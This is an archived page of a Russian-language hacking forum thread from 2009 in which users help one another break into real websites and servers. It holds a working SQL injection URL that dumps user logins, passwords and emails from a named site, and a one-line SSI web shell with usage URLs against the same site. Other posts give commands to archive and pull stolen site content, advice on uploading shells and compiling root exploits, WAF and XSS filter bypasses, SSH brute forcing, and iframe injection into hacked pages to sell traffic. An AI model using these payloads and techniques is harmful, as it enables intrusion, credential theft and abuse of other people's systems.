PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [28] 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

Spyder
18.04.2009, 15:11
http://forum.antichat.ru/thread99589.html

<SlaVka>
19.04.2009, 13:30
Войти в админку зная логин и айди адимина Реально? сайт на phpnuke

DimOnOID
19.04.2009, 15:16
Войти в админку зная логин и айди адимина Реально? сайт на phpnuke
Нет ))..

.:[melkiy]:.
19.04.2009, 19:28
возник такой вопрос... каким образом можно найти админку сайта? т.е если стандартные пути не подходят (xxx.xx/admin.php, xxx.xx/login.php....)

Iceangel_
19.04.2009, 19:30
2 .:[melkiy]:.
гугл, robots.txt, сканер структуры сайта (pelmeshko тотже)

.:[melkiy]:.
19.04.2009, 19:33
есть у мну этот pelmeshko =) я хз как его юзать %))

razb
19.04.2009, 19:43
_http://madnet.name/tools/madss/ вот это посмотри

Pashkela
19.04.2009, 19:44
Ну это попробуй, ридми в комплекте:

Скачать (http://pashkela.narod.ru/progi/Sitescaner1.1.rar)

DrAssault
19.04.2009, 19:51
2.:[melkiy]:. D@mned CGI Scanner или nikto перловский...

Yosch23
20.04.2009, 17:30
Всем привет. Помогите кто чем может) Вообщем на одном сайте хотел попробовать инъекцию, после =123 поставил ' и текст который просто без ' исчез. Пробовал union select дошёл до 50 подумал может вообще ничего и не выйдет, короче ребят это бе3толковое дело если на ' или там ; ну и прочие символы вместо ошибки ничего не появляеться это можно даже не стараться подбирать количество строк? или как(( вообщем ребят помогите пожалуйста что делать та(

FarIZ
20.04.2009, 17:33
у меня такой вопрос .

php-инклудинг позволяет просматривать файлы,

а сами php-скрипты просматривать можно с помощью этого же инклуда ?

я пробовал , скрипты просто выполняются, т.е. контент посмотреть нельзя

159932
20.04.2009, 17:37
ну значит файлы просто инклудяться в скрипт .. include($_POST[file]);
а файлы не являющиеся исполняемым пхп кодом воспринемаються как текст и просто выводяться на экран ..

поэтому попробуй проинклудить внешний код, если урлы разрешены, получишь шелл.. ну а если нет, попробуй записать в логи шелл .. ну или если можно аплоадить на хост файлы, допиши шелл в картинку или ещё чтонить ..

DimOnOID
20.04.2009, 17:37
у меня такой вопрос .

php-инклудинг позволяет просматривать файлы,

а сами php-скрипты просматривать можно с помощью этого же инклуда ?

я пробовал , скрипты просто выполняются, т.е. контент посмотреть нельзя
Если выполняется..значит нельзя.

--StraNger--
20.04.2009, 17:38
Скрипты выполняются потому что расширение *.php
если приперло так,
то раз есть пхп инклуд попробуй залить шелл и т.д. в нужном направлении
\\сорри, что повторился
пока писал уже два поста появилось)

Jokester
20.04.2009, 17:45
Скрипты выполняются потому что расширение *.php

Серьёзно? Тоесть при инклуде играет роль расширение?

Дружище попрошу больше охинею не писать

-m0rgan-
20.04.2009, 17:45
у меня такой вопрос .

php-инклудинг позволяет просматривать файлы,

а сами php-скрипты просматривать можно с помощью этого же инклуда ?

я пробовал , скрипты просто выполняются, т.е. контент посмотреть нельзя

Можно, но не всегда

Пример когда можно:
http://www.agata.org.br/show_file.php?file=index.php

DimOnOID
20.04.2009, 17:46
Всем привет. Помогите кто чем может) Вообщем на одном сайте хотел попробовать инъекцию, после =123 поставил ' и текст который просто без ' исчез. Пробовал union select дошёл до 50 подумал может вообще ничего и не выйдет, короче ребят это бе3толковое дело если на ' или там ; ну и прочие символы вместо ошибки ничего не появляеться это можно даже не стараться подбирать количество строк? или как(( вообщем ребят помогите пожалуйста что делать та(

Если ты поставил кавычку ..и текст исчез ..это не значит что в этом параметре есть иньекция….и поэтому перебирать в слепую да ещё и union select не имеет смысла.
Кавычка ..Как правило вызывает ошибку mysql…Если ошибка есть..считай у тебя скуля…И даже если ошибки нету..это не значит что там нету инъекции…Нужно проверять и дальше.
Вообщем читай стати по Инъекциям..Юзай поиск

Pashkela
20.04.2009, 17:50
Кавычка ..Как правило вызывает ошибку mysql…Если ошибка есть..считай у тебя скуля


Вовсе необязательно. Все такие вопросы лучше читать здесь:

https://forum.antichat.ru/thread104591.html

ElteRUS
20.04.2009, 17:50
Можно, но не всегда

Пример когда можно:
http://www.agata.org.br/show_file.php?file=index.php

Это не инклуд

http://www.agata.org.br/show_file.php?file=show_file.php


...
highlight_file($file);
...


Читалка файла с подсветкой пхп-кода
http://www.phpdig.net/ref/rn39re744.html

-m0rgan-
20.04.2009, 17:51
Если ты поставил кавычку ..и текст исчез ..это не значит что в этом параметре есть иньекция….и поэтому перебирать в слепую да ещё и union select не имеет смысла.
Кавычка ..Как правило вызывает ошибку mysql…Если ошибка есть..считай у тебя скуля…И даже если ошибки нету..это не значит что там нету инъекции…Нужно проверять и дальше.
Вообщем читай стати по Инъекциям..Юзай поиск


не обязательно скуля...

2Yosch23
Если не вілитает ошибка, значит скорее всего error_reporting(0);

Через union select долго, если есть воозможность юзай конструкцию order by

DimOnOID
20.04.2009, 18:06
Вы слепы

Кавычка ..Как правило вызывает ошибку mysql…Если ошибка есть..считай у тебя скуля
:D

-m0rgan-
20.04.2009, 18:15
Я имел в в виду инїекцию в скрипте:
Если ты поставил кавычку ..и текст исчез ..это не значит что в этом параметре есть иньекция….

Jokester
20.04.2009, 18:15
DimOnOID
Ну зачем ты настаиваешь? Это не верно даже со всеми твоими оговорками.
Особенно в этой части "Если ошибка есть..считай у тебя скуля".

Кавычка может вызывать ошибку, но скуль (инжектирование в запрос) ты не проведёшь.

Лимит\фильтры\процедуры\и т.д.

Если ошибка есть, то ВОЗМОЖНО есть скуль и не более.

DimOnOID
20.04.2009, 18:50
DimOnOID
Ну зачем ты настаиваешь? Это не верно даже со всеми твоими оговорками.
Особенно в этой части "Если ошибка есть..считай у тебя скуля".

Кавычка может вызывать ошибку, но скуль (инжектирование в запрос) ты не проведёшь.

Лимит\фильтры\процедуры\и т.д.

Если ошибка есть, то ВОЗМОЖНО есть скуль и не более.
Я говорил о роле кавычке в отношении иньекции..Вот на чём....и не более..давайте не будем затрагивать другие баги/уязвимости в скриптах если речь идёт о иньекции...
P.S Оперативно правите...Желающи продолжить флуд в пм.. ;)

Jokester
20.04.2009, 19:06
Я говорил о роле кавычке в отношении иньекции..Вот на чём....и не более..давайте не будем затрагивать другие баги/уязвимости в скриптах если речь идёт о иньекции...

Не вполне понимаю , что ты пытаешься оспорить. Я тоже говорю о кавычке и ошибках базы. Видимо у нас разное представление о значении слова "инъекция". Так вот ИНЪЕКЦИЯ это внедрение в запрос своего кода (инжектирование),она же скуль. А ошибка базы это просто ошибка и НИКАКИХ заключений о возможности проведения инъекции по ошибке базы делать нельзя. Они попросту будут не верны. В качестве примера я уже упомянул limit, в котором кавычка тоже может вызвать ошибку, но провести скуль не удасться

Ты-же говоришь "Если ошибка есть..считай у тебя скуля" повторяю Это не так. Есть 1000 условий при которых ошибка будет, а скуль ты не проведёшь.

P.S Оперативно правите...
Ты о чём? Я не поправил ни одного поста. После исправления появляется текст "Последний раз редактировалось...." Паранойя ? :)

DimOnOID
20.04.2009, 19:20
Не вполне понимаю , что ты пытаешься оспорить. Я тоже говорю о кавычке и ошибках базы. Видимо у нас разное представление о значении слова "инъекция". Так вот ИНЪЕКЦИЯ это внедрение в запрос своего кода (инжектирование),она же скуль. А ошибка базы это просто ошибка и НИКАКИХ заключений о возможности проведения инъекции по ошибке базы делать нельзя. Они попросту будут не верны. В качестве примера я уже упомянул limit, в котором кавычка тоже может вызвать ошибку, но провести скуль не удасться

Ты-же говоришь "Если ошибка есть..считай у тебя скуля" повторяю Это не так. Есть 1000 условий при которых ошибка будет, а скуль ты не проведёшь.


Ты о чём? Я не поправил ни одного поста. После исправления появляется текст "Последний раз редактировалось...." Паранойя ? :)
Ме в шоке...опять не замечаешь некоторые слова..И хватит наконец меня тут учить ;) если я некорректно выразил свою мысль.и ты не так понял....это ничего не значит...Хорошо бы так отвечали на вопросы новичков..развёрнутно..с душОй :D

diznt
20.04.2009, 21:33
всем ку
и так пытаюсь записать в файл member_id и password при входе в профиль SMF но когда записываю у меня появл. вместо пароля звездочки
что делать?(файл LoginInOut.php) записываю $_REQUEST['passwrd']

ronald
21.04.2009, 14:42
Как с помощью SQL-иньекции просматривать таблицы в БД? помню что там было что-то с лимитом, а вот, что точно-забыл
Мускул версии 4.0.27

winstrool
21.04.2009, 14:47
в конце к названию таблице допиши limit+1,1
пример:union+select+1,2,3,columns,4,5+from+u sers+limit+1,1--

ronald
21.04.2009, 14:55
мне нужно смотреть названия таблиц в БД, а не названия колонок в какой-то таблице

Spyder
21.04.2009, 15:00
select table_name from information_schema.tables limit 0,1
если mysql => 5

Spyder
21.04.2009, 15:05
у тебя 4 версия, поэтому никак =)

gromoza
21.04.2009, 17:14
Может конешно тупо, но
Warning: odbc_exec(): SQL error: [Sybase][ODBC Driver][SQL Anywhere]Right truncation of string data, SQL state 22001 in SQLExecDirect in D:\DATA\www\engine\modules\profile.php on line 192
Будет ли это предпосылками к sql инЪекции или просто раскрытие путей?
PS в поле писал "><ScRIpt>alert("XSS")</ScrIpt>
PPS union+select+1,2,3,columns,4,5+from+users+l imit+1,1-- так же выдаёт это

-m0rgan-
21.04.2009, 17:19
Скорее всего раскрытие путей в связи с ошибкой БД.
Нужно проверять...

а при чём здесь:
union+select+1,2,3,columns,4,5+from+users+limit+1, 1--
о.О
Это был всего лишь образец, в котором columns это колонка, а users это таблица, и она к тебе не относится...

gromoza
21.04.2009, 17:22
Скорее всего раскрытие путей.

а при чём здесь:
union+select+1,2,3,columns,4,5+from+users+limit+1, 1--
о.О
Это был всего лишь образец, в котором columns это колонка, а users это таблица, и она к тебе не относится...
Да я знаю что ко мне это не отностся, я это просто пихнул для теста =)

Campery
21.04.2009, 17:24
http://www.jax-inter.net/ что тут можно сделать? мне нужно мыло под этим доменом :/

-m0rgan-
21.04.2009, 17:40
Test Page
А что тут сделаешь если ничего не установлено???

iv.
22.04.2009, 14:30
Запустил nmap -A, получил следующие результаты:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.2 (protocol 2.0)
25/tcp filtered smtp
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
514/tcp filtered shell
593/tcp filtered http-rpc-epmap
1090/tcp filtered unknown
1434/tcp filtered ms-sql-m
1720/tcp open H.323/Q.931?
2041/tcp filtered interbase
2042/tcp filtered isis
2869/tcp filtered unknown
Device type: general purpose|firewall|broadband router|WAP
Running (JUST GUESSING) : Linux 2.6.X (88%), SonicWALL embedded (88%), Scientific Atlanta embedded (86%), Secure Computing embedded (86%), Siemens embedded (85%), Belkin embedded (85%)
Aggressive OS guesses: Linux 2.6.12 - 2.6.20 (88%), SonicWALL ES 300 email security appliance (88%), Scientific Atlanta WebSTAR EPC2203 cable modem (86%), Linux 2.6.17 - 2.6.25 (86%), Linux 2.6.5 - 2.6.19 (86%), Secure Computing SnapGear SG 300 firewall (86%), Siemens Gigaset SE515dsl wireless broadband router (85%), Belkin Wireless Pre-N Router (85%)

Здоровому крестьянскому уму по списку фильтруемых портов станет ясно, что на хосте венда. Но фингерпринтинг дает совершенно неожиданные результаты. Неужели такой дерзкий форвардинг? Вам слово.

Pashkela
22.04.2009, 14:44
Предположение:

На виндовом серваке подняли Виртуальный Выделенный Сервер на Linux

Spyder
22.04.2009, 14:46
наябывает тебя серв, постоянно такое встречаю

iv.
22.04.2009, 14:50
наябывает тебя серв, постоянно такое встречаю
Очевидно..только вот в каком месте?
Какими ещё методами стоит просканить для более правдивых результатов?

На виндовом серваке подняли Виртуальный Выделенный Сервер на Linux
Хм, со связью с миром по ssh и ip телефонии?

Pashkela
22.04.2009, 15:16
со связью с миром по ssh и ip телефонии?


ну как бы со всеми возможностями VDS

Byrger
22.04.2009, 21:53
Возможно ли как-то ещё попробовать сделать "пробел" в запросе?
Пробовал + %20 %09 %0a %0d %2b всё так и отображается в ошибке-запросе...

И можно как-то при слепой скуле узнать префикс у таблиц в бД?

Jokester
22.04.2009, 22:36
/**/, /*lol*/, скобки, кавычки и т.д.

Но думаю дело не в пробеле. Ошибку или лучше линк запость сюда.

Префикс или из ошибки, или так-же вывести посимвольно из information_schema , если ветка пятая

Shaitan-Devil
22.04.2009, 23:10
Возможно ли как-то ещё попробовать сделать "пробел" в запросе?
Пробовал + %20 %09 %0a %0d %2b всё так и отображается в ошибке-запросе...

И можно как-то при слепой скуле узнать префикс у таблиц в бД?
К примеру с помощью функции procedure analyse() в 4 ветке. Для 5-ой то, что сказали постом выше. ПРобелы можно обойти так

select(1),2,(3)from(user)where(id=1)

Подробнее:https://blackhole.cih.ms:13000/showpost.php?p=5710&postcount=7

diznt
22.04.2009, 23:17
echo "<img src='./images/".$info.".gif' border='0'>";

Этот код может являться уязв если $info можно перезаписать? (я клоню к уязв. инклуду)

Shaitan-Devil
22.04.2009, 23:26
По моему да, но локальный. И нужен будет нулл байт. И все будет выводиться как картинка. Нужно смотреть конкретный случай
П.С. Наверное я не прав=\.

geezer.code
22.04.2009, 23:34
echo "<img src='./images/".$info.".gif' border='0'>";

Этот код может являться уязв если $info можно перезаписать? (я клоню к уязв. инклуду)
это ксс, не более.

Tigger
22.04.2009, 23:39
echo "<img src='./images/".$info.".gif' border='0'>";

Этот код может являться уязв если $info можно перезаписать? (я клоню к уязв. инклуду)


Вот скажи: ты любишь, когда все за тебя делают? Прочитай подпись электа =\ "Кто, если не ты сам?" (c) Elekt.
Вот тебе так лень самому протестить на локалхосте? о_0

PaCo
23.04.2009, 00:43
select(1),2,(3)from(user)where(id=1)

Я бы посмотрел как ты проведешь такую конструкцию в union(так даже blind не составишь):).

Jokester
23.04.2009, 01:08
PaCo
Не торопись с выводами. blind так составишь запросто, и я это описывал тут:
https://forum.antichat.ru/thread104591.html
Вопрос №6

И union можно, если немного подумать и потестить на локалке , попробуй :)

laedafess
23.04.2009, 08:38
надо что-то типо:
http://site.ru/index.php?id=1+procedure+analyse()
Только работает оно не везде.. или у мну руки кривые=\
Вот почитай : клик (http://raz0r.name/obzory/sql-inekcii-i-procedure-analyse/)

Byrger
23.04.2009, 11:07
http://site.ru/index.php?id=1+procedure+analyse()
Ага всё я узнал префикс...и нашёл тоблицу g_users
Но также там значения видимо с префиксом...
Можно ли как-то узнать эти значения? (пытался брутить то стандартному словорю SIPT4)

[Raz0r]
23.04.2009, 12:01
Возможно это поможет:
http://cr0w-at.blogspot.com/2009/03/mysql-4x.html

Byrger
23.04.2009, 13:05
']Возможно это поможет:
http://cr0w-at.blogspot.com/2009/03/mysql-4x.html
Не помогает...

http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,5,6,7,8--+

таблички
cms_config
cms_group
cms_news
cms_users (поля gid uid)

Помогите вот на счёт этого весь день и парюсь...

DrAssault
23.04.2009, 15:07
Не помогает...

http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,5,6,7,8--+

таблички
cms_config
cms_group
cms_news
cms_users (поля gid uid)

Помогите вот на счёт этого весь день и парюсь...
Собственно в чём проблема не пойму? Вывод получить чтоли? Или я чего то не понимаю?

Shaitan-Devil
23.04.2009, 15:16
Подобрать колонку, в которой хрянтся пассы=\.

Byrger
23.04.2009, 19:45
Ух... все стандартные префиксы+колонки пробрутил...300мб ушло...
Может есть другие способы?

ElteRUS
23.04.2009, 21:06
Ух... все стандартные префиксы+колонки пробрутил...300мб ушло...
Может есть другие способы?

http://avatarko.ru/znamenitosti/david_blaine.jpg


http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F,_login,_pa ss,_mail),6,7,8+from+cms_users--+



http://downloadportal.ru/10388-advanced-sql-injection-tricks-detali.html

А копирайты поставить ?

Byrger
23.04.2009, 21:12
http://avatarko.ru/znamenitosti/david_blaine.jpg


http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F,_login,_pa ss,_mail),6,7,8+from+cms_users--+
:D
Лови ++

А тогда такой вопрос...
Есть шелл
Но на сервере не нашёл компилятора gcc в каталогах /sbin/ и /bin/ как быть?
Выполняя команду gcc Exploit.c -o Exploit ничего не происходит...

И как можно слить все файлы каталога с сайтом сразу?
Safe-mode: ON
Архивировать по средствам c99 не удаётся...
может возможно какойнить дампер на PHP залить туда? Если не сложно то какой

Spyder
24.04.2009, 02:25
Byrger
если ты выполняешь
gcc Exploit.c -o Exploit из веб-шелла и у тебя ничего не происходит, то ответ ты написал ниже
Safe-mode: ON
Тебе нужен полноценный шелл, ну или хотя бы веб-шелл с нормальными правами
Пробуй залить перловый шелл, например r57pws.pl
Ищи в гугле

Scipio
24.04.2009, 03:13
если подключен mod_include, попробуй использовать SSI, создай файл с расширением shtml, например shell.shtml с таким содержанием:
<!--#exec cmd="$QUERY_STRING_UNESCAPED"-->, и пользуй его, напримерhttp://transsib-express.ru/path/shell.shtml?ls -lp

Byrger
24.04.2009, 05:36
Нет это вовершенно 2 разных гелла!
Пытаюсь слить кантент с Safe-mode: ON
И зарутить с Safe-mode: OFF

Iceangel_
24.04.2009, 05:37
2 Byrger
скомпиль на какой-нибудь другой тачке сплоит, да и загрузи его

Scipio
24.04.2009, 05:50
2Byrger
попробуй:
http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat
а первое как сказал Iceangel_

Byrger
24.04.2009, 11:09
2Byrger
попробуй:
http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat
а первое как сказал Iceangel_
Не получается заархивировать...может потому что файлы которые архивирую с правами на чтение?
Права сменить не могу = ( они стают (1234)

$n@ke
24.04.2009, 11:18
права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia
и если в каждой тройке будет r - значит можешь спокойно архивить.

может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?

Byrger
24.04.2009, 11:31
права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia
и если в каждой тройке будет r - значит можешь спокойно архивить.

может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?
Ничего не выдаёт может из-за Safe-mode: ON
Сохраняю в дирку с правами 777
любой фаил пытаюсь c99 архивировать пишет...
Can't call archivator (tar cfzv archive_9f27c.tar.gz -v0x2z.jpg)!

Конешно можно по 1 файлу выкачивать но это не дело...там их более 5к

$n@ke
24.04.2009, 12:06
uname -a выводит? а uname?
если первое нет, то либо пробелы мещают, ищи замену(по принципу $IFS), либо еще чото. если и второе не вывело,то точно сейфмод. тогда с командной строкой тебе не поработать из пхп. Там кто-то писал про перловый скрипт р57 - вот его и юзай.

ps: кинь в личку линку - посмотрю.

Dr.Gonzo
24.04.2009, 17:58
Если есть возможность выполнения любых команд на машине, но строка предварительно фильтруется на XSS, что можно сделать через такую дыру? команда cp копирует только локальные файлы почему-то:( т.е. скопировать что-то указав полный путь к сайту не получается, вот и мучаюсь, пишу названия локальных файлов наугад, потом смотрю в публичной директории их...нарыл пароль от БД, но толку-то от него...
Кто-нибудь помогите пожалуйста!!!

savigm
24.04.2009, 18:22
Добрый день.
Есть некоторый FTP-сервер на который я хочу получить доступ.

Вот что выдает nmap:
nmap -T Aggressive -A -v ftp.server.ru
Starting Nmap 4.60 ( http://nmap.org ) at 2009-04-16 17:15 MSD
Initiating Ping Scan at 17:15
Scanning xxx.xxx.xxx.xxx [1 port]
Completed Ping Scan at 17:15, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:15
Completed Parallel DNS resolution of 1 host. at 17:15, 0.01s elapsed
Initiating Connect Scan at 17:15
Scanning xxx.xxx.xxx.xxx [1715 ports]
Discovered open port 80/tcp on xxx.xxx.xxx.xxx
Discovered open port 443/tcp on xxx.xxx.xxx.xxx
Discovered open port 21/tcp on xxx.xxx.xxx.xxx
Discovered open port 22/tcp on xxx.xxx.xxx.xxx
Discovered open port 139/tcp on xxx.xxx.xxx.xxx
Discovered open port 3306/tcp on xxx.xxx.xxx.xxx
Discovered open port 111/tcp on xxx.xxx.xxx.xxx
Discovered open port 199/tcp on xxx.xxx.xxx.xxx
Discovered open port 947/tcp on xxx.xxx.xxx.xxx
Discovered open port 445/tcp on xxx.xxx.xxx.xxx
Discovered open port 2049/tcp on xxx.xxx.xxx.xxx
Completed Connect Scan at 17:15, 6.08s elapsed (1715 total ports)
Initiating Service scan at 17:15
Scanning 11 services on xxx.xxx.xxx.xxx
Completed Service scan at 17:16, 16.97s elapsed (11 services on 1 host)
Initiating RPCGrind Scan against xxx.xxx.xxx.xxx at 17:16
Completed RPCGrind Scan against xxx.xxx.xxx.xxx at 17:16, 0.04s elapsed (3 ports)
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 17:16
Completed SCRIPT ENGINE at 17:16, 5.24s elapsed
Host xxx.xxx.xxx.xxx appears to be up ... good.
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1703 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.2p1 (FreeBSD 20050903; protocol 2.0)
25/tcp closed smtp
80/tcp open http Apache httpd 1.3.36 ((Unix) mod_tsunami/3.0 mod_ssl/2.8.27 OpenSSL/0.9.7e-p1 PHP/4.4.2)
|_ HTML title: 301 Moved Permanently
111/tcp open rpcbind 2-4 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MYGROUP)
199/tcp open smux Linux SNMP multiplexer
443/tcp open http Apache httpd 1.3.36 ((Unix) mod_tsunami/3.0 mod_ssl/2.8.27 OpenSSL/0.9.7e-p1 PHP/4.4.2)
| SSLv2: server still supports SSLv2
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
|_ HTML title: 400 Bad Request
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MYGROUP)
947/tcp open rpc
2049/tcp open nfs 2-3 (rpc #100003)
3306/tcp open mysql MySQL 4.0.26
| MySQL Server Information: Protocol: 10
| Version: 4.0.26
| Thread ID: 1035137
| Some Capabilities: Connect with DB, Compress, Transactions
| Status: Autocommit
|_ Salt: $ha/b!{i
Service Info: OSs: Unix, FreeBSD, Linux

Host script results:
| Discover OS Version over NetBIOS and SMB: OS version cannot be determined.
|_ Failed to find NetBIOS share name in response to UDP NetBIOS wildcard query

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.668 seconds
Пробовал exploit для proFTPd 1.3.1 c SQL-инекцией - http://www.securitylab.ru/vulnerability/367770.php, не работает
В Apache кроме index.html по моему ничего нет, соответсвенно скрипты отсутсвуют:(
Brute-force - это нереально, тем более список пользователей взять неоткуда. Пробовал брутить root на ssh(сутки брута не дали результатов).

Просьба подсказать и пояснить каким образом можно получить доступ на сервер, последовательность действий, желательно с ссылками на эксплоиты, статьи и т.п.

Буду очень признателен за помощь.

oRb
24.04.2009, 20:58
Если есть возможность выполнения любых команд на машине, но строка предварительно фильтруется на XSS, что можно сделать через такую дыру? команда cp копирует только локальные файлы почему-то:( т.е. скопировать что-то указав полный путь к сайту не получается, вот и мучаюсь, пишу названия локальных файлов наугад, потом смотрю в публичной директории их...нарыл пароль от БД, но толку-то от него...
Кто-нибудь помогите пожалуйста!!!
Используя доступную качалку (curl, GET, wget, lwp-mirror, ...) или создав файл со скриптом аплоадером, залей шелл.
Ничего не выдаёт может из-за Safe-mode: ON
Сохраняю в дирку с правами 777
любой фаил пытаюсь c99 архивировать пишет...
Can't call archivator (tar cfzv archive_9f27c.tar.gz -v0x2z.jpg)!

Конешно можно по 1 файлу выкачивать но это не дело...там их более 5к
при safe _mode = on доступ к tar ты будешь иметь, если он будет лежать в safe_mode_exec_dir, те никогда) Поищи скрипты-архиваторы.

Dr.Gonzo
24.04.2009, 22:37
Используя доступную качалку (curl, GET, wget, lwp-mirror, ...) или создав файл со скриптом аплоадером, залей шелл.


СПАСИБО БОЛЬШОЕ!
Создать файл не получалось, резались символы >, но курл сработал!

mr.Cupper
25.04.2009, 00:51
РАзъясните мне вот такую штуку про XSS, и javascript и браузеры
вот к примеру страничка
_http://www.conspiracyarchive.com/NWO/North_American_Forum.htm
значи в поле "Conspiracy Archive Newsletter:" вбиваю сторку
"> < scr ip t >alert()< /sc ri pt>
он ее очень лево фильтрует п ропускает и вот что я получаю в коде новосгенериной стронаички
....
id="eMail" value="\"> < scr ip t >alert()< /sc ri pt>" size="30" />
....
и нехрена алерт невыпригывает, это из за того что браузер нехочет интерпретировать < scr ip t > как <script> или чета я непонимаю ?
и так по многих других сайтах

cr0w
25.04.2009, 02:17
А с чего это вдруг он будет интерпретировать "< scr ip t > как <script>" ? (;

o3,14um
25.04.2009, 05:43
вбиваю сторку
"> < scr ip t >alert()< /sc ri pt>
что за порнография?)) вбивай нормальную строку =))
вот это "><script>alert()</script> по мужски))))

Byrger
25.04.2009, 09:33
А как используют доступ к изменению index для SEO?
Допустим у меня есть шелл и я могу всё править...

mr.Cupper
25.04.2009, 12:03
"> < scr ip t >alert()< /sc ri pt>
1) <script> эти сайты фильтруют
2) < scr ip t > тут табуляция а не пробелы, и вроде браузер должен все нормально интерпретировать (хотя кажеться там были и пробелы тоже щас попробую только с табуляцияе).
Да блин, че за нах, во всех статьях про xss говориться что мол если фильтруеться то используйте табуляции, пробелы, регистры букв, притом у меня есть живой пример где
javascript:alert('На_сайте_обнаруже на_XSS_уязвимость');
неработает, а
jav ascript:alert('На_сайте_обнаружен _XSS_уязвимость'); (сдесь табуляция)
работает
че за нах (((.

Ну предположим все что я сказал выше чушь собачья, тогда если сайт фильтрует текст <script> нече сделать больше и неполучиться ? низрена не так ! вот _http://ha.ckers.org/xss.html да и на всех статьях на форуме подобной описываеться !!!!
так в чем всетаки проблема ?(

ThreeD
25.04.2009, 12:16
А как используют доступ к изменению index для SEO?
Допустим у меня есть шелл и я могу всё править...
Ставь iframe на индекс и пускай трафф на свою тдс и дальше куда уже надо, смотря по потребностям.
А вообще вопрос не в ту тему.

diznt
25.04.2009, 13:09
Нашол сервер там стоит ос UNIX
так вот там я еще обнаружил сервис по порту 10000 с описанием

VERITAS Backup Exec for Windows Servers

Так вот как это возможно? Если стоит ОС UNIX а в описании сервера написано for Windows servers

iv.
25.04.2009, 13:13
Нашол сервер там стоит ос UNIX
так вот там я еще обнаружил сервис по порту 10000 с описанием

VERITAS Backup Exec for Windows Servers

Так вот как это возможно? Если стоит ОС UNIX а в описании сервера написано for Windows servers
Что за описание? Баннер у него такой? Или сканер сказал? В любом случае, нет гарантии, что там именно этот сервис. Безумный админ мог туда поставить всё что угодно, благо номер порта легко запоминаем.

mailbrush
25.04.2009, 13:16
mr.Cupper, <img src=javascript:alert()</img>

$n@ke
25.04.2009, 13:27
diznt, порт 10000 обычно используется для webmin

Nightmarе
25.04.2009, 14:08
В общем вопрос такой... связанный с плагином FireFox для просмотра и редактирования HTTP заголовков.

На сайте есть возможность выполнять php код. Этому скрипту необходимо передать POST запрос, я делаю вот так как показанно на рисунке:
http://img5.imageshost.ru/imgs/090425/a25f1586521a2acfc18f2246f9e708f4/4fd698f7d4971fed4b919b00a9940e3a.jpg
В итоге пусто.

Но если к скрипту обратиться так:
http://www.site.ru/lol.php?lol=ass&shell=echo $_GET[lol];
То он нормально выводит: ass
Но почему-то с POST запросом это не канает, хотя по идее содержимое он должен вывести.

В общем кто знает в чём моя ошибка - объясните плз.

mr.Cupper
25.04.2009, 14:44
mr.Cupper, <img src=javascript:alert()</img>
а что вы хотели сказать то ?

если вы имелли ввиду что у меня там вместо [img] должно стоять <img> то поясню это так, поле куда я ввожу [img]... принимает BB кода, а на сайте он отображаеться как <img>, НО причем тут это вообще ??? я совсем дрогуе спросил

Jokester
25.04.2009, 14:55
Nightmarе Возьми нормальный плагин. Этот помоему не посылает пост, просто перехватывает пакеты и даёт возможность редактировать. Тоесть данные ИЗНАЧАЛЬНО должны идти постом, а сам плагин это не делает.

Рекоммендую hackbar https://addons.mozilla.org/en-US/firefox/addon/3899

Nightmarе
25.04.2009, 17:05
Nightmarе Возьми нормальный плагин. Этот помоему не посылает пост, просто перехватывает пакеты и даёт возможность редактировать. Тоесть данные ИЗНАЧАЛЬНО должны идти постом, а сам плагин это не делает.

Рекоммендую hackbar https://addons.mozilla.org/en-US/firefox/addon/3899
Во, респект! Это помогло. =)))
А насчёт плагина... я так и догадывался что запрос изначально должен быть POST...

diznt
25.04.2009, 18:44
Такой вопрос
Сканирую сканером на порты
Открыто много портов (порта 22 нету (где висит по дефолту ssh))
ну так вот я пронюхал из источников (где светился этот айпи адрес) что к нему коннектились через ssh и через порт 2299
ну так вот этого порта (2299) не обнаружил сканер! Хотя идет коннект до этого порта (putty -> ssh -> connect to ip:target port:2299)
Вот теперь такой вопрос
Почему сканер мне ничего не вывел что этот порт (2299) вообще существует на сервере?

desTiny
25.04.2009, 19:49
а может ты до 1024-го сканировал? )

diznt
25.04.2009, 19:50
desTiny нет) конечный порт 41397

cr0w
25.04.2009, 19:56
1) <script> эти сайты фильтруют
2) < scr ip t > тут табуляция а не пробелы, и вроде браузер должен все нормально интерпретировать (хотя кажеться там были и пробелы тоже щас попробую только с табуляцияе).
Да блин, че за нах, во всех статьях про xss говориться что мол если фильтруеться то используйте табуляции, пробелы, регистры букв, притом у меня есть живой пример где
javascript:alert('На_сайте_обнаруже на_XSS_уязвимость');
неработает, а
